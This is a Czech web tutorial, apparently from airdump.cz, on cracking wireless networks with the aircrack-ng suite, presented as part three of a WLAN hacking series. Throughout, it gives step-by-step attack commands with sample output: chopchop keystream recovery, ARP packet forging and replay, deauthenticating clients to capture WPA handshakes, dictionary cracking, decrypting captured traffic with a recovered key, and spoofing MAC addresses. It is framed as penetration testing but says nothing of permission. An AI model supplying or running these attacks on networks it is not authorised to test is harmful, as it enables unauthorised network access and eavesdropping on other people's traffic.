Hacking DVD BackTrack, Linux, Hashe RSS Feed twitter airdump.cz BackTrack 3 4 5 6 CZ
Security a Tip
Donate a Sponzor

WLAN Hacking 3 – Komentáře

WPA crack prolomení V poslední části velkého tutoriálu jsou zmíněny speciální případy kdy nefunguje většina útoků (Rejects open-system authentication, KoreK chochop, fragmentační útok). Dále zde najdete komentáře pro řešení složitějších situací a doporučení, postup jak detekovat wifi sítě programem Kismet, postup jak detekovat bránu v síti, připojení do wifi sítě, změnu MAC adresy, zmínku o pásmu 5 GHz, stručnou zmínku o WPA a další

Rejects open-system authentication

Na Access Point co neumožňuje open-system autentizaci se nelze autentizovat – asociovat. Příklad, příkaz

aireplay-ng -1 0 -e wireless -a 00:60:11:33:55:77 -h 00:61:11:22:33:44 wlan0

končí chybovou hláškou :

Waiting for beacon frame (BSSID: 00:30:4F:36:04:D0)
Sending Authentication Request
AP rejects open-system authentication
Please specify a PRGA-file (-y).

MAC adresa v parametru -a stejně jako v parametru -h a rozhraní je z našeho testu – u sebe používáte vlastní hodnoty.

Řešení rejects open-system authentication chyby

Lze použít kombinaci experimentálního kódu MDK a Ska. Existuje i podstatne jednodussi cesta. KoreK chopchop a packetforge-ng. Pomoci teto techniky lze prolomit WEP bez asociace na AP :) Příkaz – útok -4

aireplay-ng -4 -b 00:60:11:33:55:77 -h 00:61:11:22:33:44 wlan0

Soubor:Aireplay-ng-4.png

Začnou nabíhat data a po tom co se objeví větší paket se správným pořadím MAC adres zvolíme ano (yes). To co konzole ukazuje vypadá to nějak takhle.

Read 1094 packets…
.
Size: 242, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:60:xx:xx:xx:xx
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:61:xx:xx:xx:xx
.
0x0000: 0842 0000 ffff ffff ffff 0030 4f36 04d0 .B………0O6..
0x0010: 0090 9638 9353 2045 f65e 0100 4a62 0eae …8.S E.^..Jb..
0x0020: defa 2c0a 049e 2374 46e9 d5c4 d125 38e8 ..,…#tF….%8.
0x0030: f20a cf7b ac9e 0b60 4bce d284 5171 3336 …{…`K…Qq36
0x0040: 263d e597 13d8 cf9d f8a1 bf4b c3dd 6d92 &=………K..m.
0x0050: cfd8 373e 1464 7cd2 888e 5b0a c6fc 057c ..7>.d|…….|
0x0060: d490 63eb aa53 37ea dedc 03b6 c9ea f86e ..c..S7……..n
0x0070: aefb 895f edc1 ad21 e2a1 8479 7a50 2bd1 …_…!…yzP+.
0x0080: 7af1 fca5 dbe5 d7ad bd8e 429b a638 2c1e z………B..8,.
0x0090: c98c ad3b 6f4a fa5a 623f 5291 59f9 bc50 …;oJ.Zb?R.Y..P
0x00a0: a3f1 cda8 b05d 480e 1036 3745 a7cb 2452 …..H..67E..$R
0x00b0: 9054 3e19 b6cd fff4 7719 4193 0178 1665 .T>…..w.A..x.e
0x00c0: e4d7 085e 9207 9adb a9fa 5d05 820d fc01 …^………..
0x00d0: 87c5 43e3 32b5 d1f4 4a11 fa8c 410b 2897 ..C.2…J…A.(.
— CUT —
Use this packet ? y

Soubor:Aireplay-ng_-4_savethis.png doplnit

Po volbě yes uvidíte něco jako:

Saving chosen packet in replay_src-0623-171055.cap
.
Offset 241 ( 0% done) | xor = 32 | pt = 89 | 517 frames written in 1551ms
Sent 684 packets, current guess: A9…17:11:01 Packets per second adjusted to 375
Offset 240 ( 0% done) | xor = 0C | pt = 5E | 1134 frames written in 3404ms
Sent 408 packets, current guess: 96…17:11:06 Packets per second adjusted to 282
Offset 239 ( 0% done) | xor = B1 | pt = B0 | 431 frames written in 1298ms
Offset 238 ( 1% done) | xor = DF | pt = 46 | 449 frames written in 1794ms
Offset 236 ( 2% done) | xor = 2A | pt = 00 | 530 frames written in 2120ms
Sent 479 packets, current guess: DD…17:11:16 Packets per second adjusted to 212
Offset 235 ( 2% done) | xor = DD | pt = 00 | 490 frames written in 1962ms
Offset 40 (96% done) | xor = 76 | pt = 30 | 21 frames written in 105ms
Sent 5066 packets, current guess: B6…
.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
.
Saving plaintext in replay_dec-3-30.cap
Saving keystream in replay_dec-3-30.xor
.
Completed in 753s (0.27 bytes/s)

Soubor:Aireplay-ng-complet-in.png doplnit

Dalsi krok je vygenerovani „requestu“ ktery se ulozi do souboru (PRGA) ktery lze pouziva opakovane. Bude „fungovat“ i v pripade, ze na AP zmenite heslo.

packetforge-ng -0 -a MAC -h MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-3-30.xor -w arp-req

Soubor:Packetforge_wrote.png‎ doplnit

Nasleduje příkaz:

aireplay-ng -2 -r arp-request wlan0

Soubor:Aireplay-ng_-2_arp-request.png doplnit

Schromazdeni dat a crack wep klice cca 45 minut.

Soubor:Aircarck-ng_end.png‎|Aircrack-ng 0.9 r453

Zjištění IP, Gateway

IP adresu, DNS, bránu a mnoho dalších užitečných informací lze vyčíst buďto přímo z dat které máme k dispozici nebo pomoci dalších nástroju které umí používat WEP nebo WEP pro dešifrováni trafiku. Mezi tyto nástroje patří rozhodne Wireshark nebo Ettercap. Potrebne udaje muzeme zjistit desifrovanim traficu.

airdecap -b 00:06:B3:XX:XX:XX test.cap

V Airdecap lze pro dešifrování použít WEP klíč i ve formátu HEX

airdecap -w 11A3E229084349BC25D97E2939 test.cap

nebo pouzitim Etherealu s filtrem mac adresy access pointu. TCP provoz mac 00:06:B3:XX:XX:XX:
WEP klic jde vlozit i primo do konfigurace Ethereal

wlan.bssid
00:06:B3:XX:XX:XX (&& TCP)

Pouzivat zjisteny WEP klic umi take Kismet.

wepkey=00:60:B3:XX:XX:XX,6263656869646162

Soubor:Kismet1.png

Po spusteni Kismet u Flags uvidime pismeno W

Soubor:Kismet2.png

vlozime do kismet.conf (cca řádek 154). Nasledne spusteni programu pak odhali IP adresy prirazene jednotlivym MAC. Seradime site třeba volbou -s sort -b bssid, pak u toho ktereho AP volba -c – zobrazi klienty

Soubor:Kismet3.png

Je libo Matrix? V Kimsetu volba -d zobrazi data která protekaji AP.

Soubor:Kismet4.png

Aireplay-ng + CM9 a,b,g

Atheros karta se v systemu Linux zaregistruje jako rozhraní ath0. Ovladac madwifi existuje ve verzi old a ng. Pokud funguje starší verze není duvod experimentovat. Ovladani WiFi karty atheros na poslednich ovládačích madwifi-ng je poněkud komplikované. Může zato změna příkazů pro ovládaní.

Zjištění podporovaných frekvencí na kartě (volba 0,1,2,3) příkazem
iwpriv ath0 mode 1

Výpis rozsahu kanálu.
iwlist ath0 chan

Vyjma novych moznosti ve verzi -ng a spusteni samotneho Airodump-ng, lze prikazy z baliku Aircrack pouzivat v baliku Aircrack-ng t.z airmon, aireplay, aircrack – staci dopsat -ng a pobezi to
Vystup je az na detaily stejny.

airodump-ng –ivs -w data –-ch 6 ath0

Soubor:Airdump-ng.png

..spustí Airodump-ng na kanálu č. 6 a Inicializační vektor|ivs ukláda do souboru data. Soubor naleznete v ceste ve které je aplikace spuštěna (defaultně /home/user).

Pásmo 5 GHz

Airodump-ng scan (pouze) pásma 5GHz (5.1 az 5.8 GHz) lze docílit použitím prepínače –band
airodump-ng –band a –ivs -w data ath0

Airodump-ng v pásmu 5 GHz – pouze kanál 34
airodump-ng –ivs -w data –-ch 34 ath0

Seznam kanálu a frekvencí v pásmo 5GHz|pásmu 5GHz

Prolomení WPA zabezpečení

Pro získaní handshake použijte stejný způsob jako u deautentifikace klienta. S reautentifikaci klient opětovně zašle data které airodump-ng zachytí jako tkz. handshake. Příkaz si přizpůsobte dle vlastní potřeby (MAC adresy jsou smyšlené a použijte samozřejmě vlastní). Příkaz pro zapnutí záznamu dat na kanálu číslo 3 a ukládaní do souboru wpa-data.cap je

airodump-ng -b 01:02:03:04:05:06 -w wpa-data –ch 3 wlan0

Příkaz pro odpojení a vynucení reautentifikace klienta. Klient (po odpojení) zašle data které airodump-ng zachyti (tento způsob ale nefunguje 100%).

aireplay-ng -0 5 -a 01:02:03:04:05:06 -c 01:02:03:04:05:07 wlan0

Příkaz pro slovníkový útok je:

aircrack-ng -w password.lst wpa-data.cap

Jak získat handshake alternativní cestou (když selže klasický způsob) pro pozdější crack WPA klíče si můžete přečíst v článku http://airdump.cz/clanky/utoky-na-bezdratove-site-crack-wpa Útoky na WPA sítě. Prolomení WPA lze otestovat na souborech které získate s instalací balíčku Aircrack-ng (naleznete je po instalaci Aircrack-ng ve složce test).

wpa.cap wep.open.system.authentication.cap wep.shared.key.authentication.cap wpa2.eapol.cap password.lst

Nejnovější útok na prolomení WPA zabezpečení za použití hashů a cowpatty je popsán v textu http://airdump.cz/clanky/prolomeni-wpa-zabezpeceni Prolomení WPA.

Připojení do sítě

Konfigurace – Dynamické přidělení IP adresy

Změna módu (pokud karta funguje jinak jako Managed např. jako ad-hoc nebo Master)

iwconfig wlan0 mode managed
dhclient wlan0

Konfigurace – Dynamické přidělení IP adresy + WEP klíč

iwconfig wlan0 essid „wifi“ mode Managed key open s:“29reac7BOz9Sbv“

Konfigurace – Pevná IP Ad-Hoc

iwconfig wlan0 mode Ad-Hoc

iwconfig wlan0 channel X

iwconfig wlan0 essid Y

ifconfig wlan0 192.168.0.10 up

Konfigurace – pouze IP adresy

ifconfig wlan0 192.168.0.10 up

Konfigurace – pouze ESSID

iwconfig wlan0 essid Y

Změna MAC adresy

Sled šesti hexadecimálních čísel lze změnit příkazem

ifconfig wlan0 down

ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX

ifconfig wlan0 up

nebo dalším příkazem:

/sbin/ip link set wlan0 addr XX:XX:XX:XX:XX:XX

Linux utilita macchanger dokáže generovat a přirazovat libovolnou MAC.

macchanger -r wlan0

nebo konkrétní MAC

macchanger -m XX:XX:XX:XX:XX:XX

Restart site (jako root)

/etc/init.d/networking restart

Reset IP

ip addr flush dev wlan0

Bonus

Užitečné linky

http://airdump.cz/distribuce-ceske-verze-backtrack-wifislax Lokalizována penetrační distribuce Backtrack Cz.
Hledáni brány, analýza sítě, trafiku, http://airdump.cz/clanky/sniffing-analyza-dat sniffing a Man-in-the-middle attack|MITM útok.
Skvělá stránka o WiFi anténach, frekvencích a wi-fi problematice: http://homewifi.wz.cz
Regulace výkonu WiFi karet na chipu Prism na http://wiki.pvfree.net/index.php/XI626_hostap_a_regulace_vykonu PVwiki
Wi-Fi: http://airdump.cz/tutorial-page Tutoriály na AirDump.Net
Jak provest Hostap Packet Injection Patch http://airdump.cz/clanky/feisty-fawn-packet-injection-hostap Ubuntu Feisty Fawn
Různe příkazy pro CMD|Linux.
Pokud dávate přednost OS Windows mrkněte na specifika Windows Konzole.
Flash http://linux.junsun.net/intersil-prism/index.html Intersil Firmware nebo změna MAC WiFi karty na chipu Prism.
Pro další WiFi Hacking nápovědu viz. WiFi Hacking FAQ

Tipy

Než začnete..

Udělejte si dostatek času, čtěte, diskutujte, ptejte se.
Používejte vlastní poznámky (třeba program kNotes)
Každa aplikaceobsahuje manuál (man) nebo nápovědu (help) kterou lze zobrazit v konzole. Příklad pro manuál Aireplay:

man aireplay nebo aireplay –help

Man ukončíte pomocí q Bežíci aplikaci v konzole pomocí ctrl+c Existuje řada užitecných přikazů. Oplatí se číst. Možnosti Linuxu jsou obrovské

while „1“ ; do aireplay-ng -1 0 -e ap_franta -a 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0;
sleep 6; aireplay-ng -0 5 -a 00:60:xx:xx:xx:xx eth2; sleep 6; done

Techniky implementovány v aplikaci Aireplay fungují 100% pouze v distribucích Linux. Existuje http://airdump.cz/aireplay-windows-injection/ hack pro Windows XP, je ale nestabilní.
Vše, co stahujete pomoci wget, najdete ve složce kde aplikaci použijete. Stejne tak log aplikace Airodump. Standardně home adresář uživatele /home/user nebo v Backtrack a Wifislax /root (protože se do systému přihlásite rovnou jako root).
DVD ISO Ubuntu 6.06.1 můžete objednat poštou nebo stáhnout napr. http://nginyang.uvt.nl/dapper zde
Před instalací operačního systému se raději poraďte. Disk rozdělte předem. Čistá instalace je nekomplikovaná i pro nezkušeného uživatele. Rozdelení hardisku u instalace Ubuntu vyžaduje oznacit / a /swap. Pro / nadělte 5 až 10 GB prostor, pro swap maximálně 1GB.
Pro jednorázový penetrační test vystacite s LiveCD BackTrack, WifiSlax nebo se starším Auditor. Tyto distribuce v ISO lze pred vypalenim modifikovat. Není je potřeba instalovat. LiveCD aplikace misto hardisku používá operační paměť.
Každou aplikaci Wellenreiter, Nessus, THC Hydra|Hydra, Kismet, Metasploit Framework|Metasploit a pod. obsažena v specializovaných distribucích, je možné instalovat a provozovat i pod Ubuntu. Obdoba specializovanych CD je nUbuntu.
MAC Access Pointu která začíná 00:60:B3 nemá sifrovani silnější než 128 bit. Jedná se o home made. AP je v tomto případě počítač s kartou Z-Com (Debian + hostapd). Karta Z-Com neumi 256bit sifrovani ani WPA.
Nepouzivejte Kismet starsi jako verze 2005.08.R1. Je dokumentovana (kriticka) chyba (integer underflow). U zpracovani netisknutelnych znaku v SSID (zpracování souboru pcap – rozklad datových ramcu) umozní spustit libovolny(?) kód.
Wifi kartu nakupujte vyhradne podle chipsetu. Osvedceny je Prism (hostap) a Atheros (madwifi). RTL8180 funguje. (napr. Edimax EW-7126 PCI). Géčkova verze už má jiny chipset.
Mimo stůl bez vhodne anteny ztracite cas.
Vyzařovací uhel wifi anteny 30 nebo vic stupnu je vhodný pro detekci bezdrátových sítí. Pro připojení na větší vzdálenost (> 2km) v zarušeném prostředí se nehodí. Protoze na jedne frekvenci muze byt vice AP a frekvence se v pasmu 2,4GHz prolinaji, vzdy zachytite i nezadouci trafik (rušení). Vhodna antena je uzce (8°) směrová. Když antena není umistena v otevrenem prostoru, je vhodne pouzit antenu ktera nesviti dozadu. Umístěním na zeď lze příjem citelně ovlyvnit (negativně). Ideálni je plná parabola. PSV|SWR je důležitější parametr než zisk nebo útlum. V kombinaci se širším vyzařovacím uhlem nemusíte se vzdálenějšim Access Pointem (detekovanem v Airodump) vůbec ustavit spojení. Plnohodnotné spojení (dle karty a ovládaču) vyžaduje minimálni hodnoty, jinak se spojení rozpadne.
Oficiálni minimum u CM9 je -95dB, Z-Com -92dB (myslím, že Z-Com je v reálu někde kolem -85dB). Orientačně: Rate 1Mbit, 15dB smerova antena = 4 km

Tabulka – Fresnelova zóna:

Soubor:fresnelova_tabulka.png

Nepokládejte konektor pigtailu na topení. Pokud máte starší (kovovou) totálni endoprotézu loketního kloubu, držte anténu druhou rukou :-)

Kam dál?



Přihlásit / Odhlásit odběr novinek

Počet přihlášených k odběru novinek

    2573